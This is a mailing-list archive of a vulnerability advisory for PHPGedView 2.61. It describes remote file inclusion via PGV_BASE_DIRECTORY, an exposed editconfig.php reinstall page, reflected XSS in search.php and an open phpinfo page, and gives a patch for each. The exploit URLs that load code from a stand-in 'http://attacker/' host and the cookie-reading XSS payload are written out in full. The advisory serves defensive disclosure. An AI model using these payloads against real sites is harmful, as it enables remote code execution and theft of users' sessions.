Vuln in PHPGEDVIEW 2.61 Multi-Problem

[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

 


Tittle : Vuln in  PHPGEDVIEW  2.61
Lang : PHP  
Author : Windak
Website: www.security.com.vn
Version : PHPGEDVIEW 2.61 Multi-Problem

Introduction :

PHPGEDVIEW is program read projects GEDCOM file ( default html ) .

Bug :  

1) Php code injection : 

Rick : Hight 
- Vuln in any files : functions.php, authentication_index.php ,config_gedcom.php 

In authentication_index.php file : at line 33 : 

require $PGV_BASE_DIRECTORY."authenticate.php"; 

In functions.php file : at line 35 : 

require($PGV_BASE_DIRECTORY."functions_print.php"); 

In config_gedcom.php file :  at line 115 : 

if (file_exists($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php")) require($PGV_BASE_DIRECTORY.$THEME_DIR."theme.php"); 
else { 
$THEME_DIR = $PGV_BASE_DIRECTORY."themes/standard/"; 
require($THEME_DIR."theme.php"); 


Exploit  : 

http://target/phpgedview_folder/authentication_index.php?PGV_BASE_DIRECTORY=http://attacker/ 
http://target/phpgedview_folder/functions.php?PGV_BASE_DIRECTORY=http://attacker/ 
http://target/phpgedview_folder/config_gedcom.php?PGV_BASE_DIRECTORY=http://attacker/ 

Script named authenticate.php put in http://attacker/  ( or functions_print.php , theme.php put in folder /themes/standard /

FIX  : add firt line files have been vuln :  Require (config.php); 

2) Config again : 
rick: Medium 
If you not deleted editconfig.php file after install then attacker can reinstall and change password administrator .
Link : http://target/phpgedview_folder/editconfig.php 
fix : Delete editconfig.php file

3) XSS : 
Rick  : medium 

Exploit : 
http://localhost/phpgedview/search.php?action=soundex&firstname=";><script>alert(document.cookie)</script> 

fix : 

Find : 
<input type="text" name="firstname" value="<?php if ($action=="soundex") print $firstname; size="20" ?>" /></td></tr> 
<tr><td><?php print $pgv_lang["lastname_search"]?></td><td> 
<input type="text" name="lastname" value="<?php if ($action=="soundex") print $lastname; size="20" ?>" /></td></tr> 
<tr><td><?php print $pgv_lang["search_place"]?></td><td> 
<input type="text" name="place" value="<?php if ($action=="soundex") print $place; size="20" ?>" /></td></tr> 
<tr><td><?php print $pgv_lang["search_year"]?></td><td> 
<input type="text" name="year" value="<?php if ($action=="soundex") print $year; size="20" ?>" /></td></tr> 

replace with : 

<input type="text" name="firstname" value="" /></td></tr> 
<tr><td><?php print $pgv_lang["lastname_search"]?></td><td> 
<input type="text" name="lastname" value="" /></td></tr> 
<tr><td><?php print $pgv_lang["search_place"]?></td><td> 
<input type="text" name="place" value="" /></td></tr> 
<tr><td><?php print $pgv_lang["search_year"]?></td><td> 
<input type="text" name="year" value="" /></td></tr> 

4) Show info server : 
rick : low 
I can show info server 
Link: http://target/phpgedview_folder/admin.php?action=phpinfo 

fix : 
Find :  

if (!isset($action)) $action=""; 
if ($action=="phpinfo") { 
phpinfo(); 
exit; 
} 

if (!userIsAdmin(getUserName())) { 
header("Location: login.php?url=admin.php"); 
exit; 
} 

replace with : 

if (!userIsAdmin(getUserName())) { 
header("Location: login.php?url=admin.php"); 
exit; 
} 
if (!isset($action)) $action=""; 
if ($action=="phpinfo") { 
phpinfo(); 
exit; 
} 

=======================================================================
Windak - Vietnamese Security Group

www.security.com.vn
[Index of Archives]     [Linux Security]     [Netfilter]     [PHP]     [Yosemite News]     [Linux Kernel]

  Powered by Linux